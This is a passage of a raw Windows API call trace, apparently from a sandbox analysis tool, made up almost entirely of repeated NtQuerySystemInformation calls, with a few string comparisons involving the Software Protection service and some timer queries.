[0217.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0217.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0217.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0217.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0217.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0217.978] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0217.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x50, ResultLength=0x0) [0217.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0217.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0217.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0217.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x28, ResultLength=0x0) [0217.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0217.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0217.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0217.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0217.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0217.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x50, ResultLength=0x0) [0218.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x50, ResultLength=0x0) [0218.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x50, ResultLength=0x0) [0218.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc20, Length=0x50, ResultLength=0x0) [0218.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc20, Length=0x50, ResultLength=0x0) [0218.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc20, Length=0x50, ResultLength=0x0) [0218.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc20, Length=0x50, ResultLength=0x0) [0218.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x38, ResultLength=0x0) [0218.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x28, ResultLength=0x0) [0218.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x28, ResultLength=0x0) [0218.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x28, ResultLength=0x0) [0218.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x28, ResultLength=0x0) [0218.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x28, ResultLength=0x0) [0218.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x38, ResultLength=0x0) [0218.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x28, ResultLength=0x0) [0218.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x28, ResultLength=0x0) [0218.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0218.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x20, ResultLength=0x0) [0218.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x20, ResultLength=0x0) [0218.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x20, ResultLength=0x0) [0218.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x38, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x38, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x20, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd960, Length=0x20, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd960, Length=0x20, ResultLength=0x0) [0218.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc8, Length=0x50, ResultLength=0x0) [0218.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc40, Length=0x28, ResultLength=0x0) [0218.202] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0218.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc8, Length=0x50, ResultLength=0x0) [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc8, Length=0x50, ResultLength=0x0) [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x50, ResultLength=0x0) [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb30, Length=0x28, ResultLength=0x0) [0218.203] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x50, ResultLength=0x0) [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x50, ResultLength=0x0) [0218.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x50, ResultLength=0x0) [0218.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdae0, Length=0x38, ResultLength=0x0) [0218.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x28, ResultLength=0x0) [0218.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x28, ResultLength=0x0) [0218.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x28, ResultLength=0x0) [0218.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x28, ResultLength=0x0) [0218.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdae0, Length=0x38, ResultLength=0x0) [0218.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x28, ResultLength=0x0) [0218.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x28, ResultLength=0x0) [0218.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdae0, Length=0x38, ResultLength=0x0) [0218.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd960, Length=0x20, ResultLength=0x0) [0218.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x20, ResultLength=0x0) [0218.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x20, ResultLength=0x0) [0218.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x20, ResultLength=0x0) [0218.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdae0, Length=0x38, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd960, Length=0x20, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x20, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x20, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a67fdc10 | out: lpSystemTimeAsFileTime=0xf7a67fdc10*(dwLowDateTime=0x146ebeb3, dwHighDateTime=0x1d63874)) [0218.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc8, Length=0x50, ResultLength=0x0) [0218.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc00, Length=0x28, ResultLength=0x0) [0218.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb18, Length=0x50, ResultLength=0x0) [0218.218] GetTickCount () returned 0x1177070 [0218.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e8, Length=0x58, ResultLength=0x0) [0218.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0218.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0218.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0218.221] 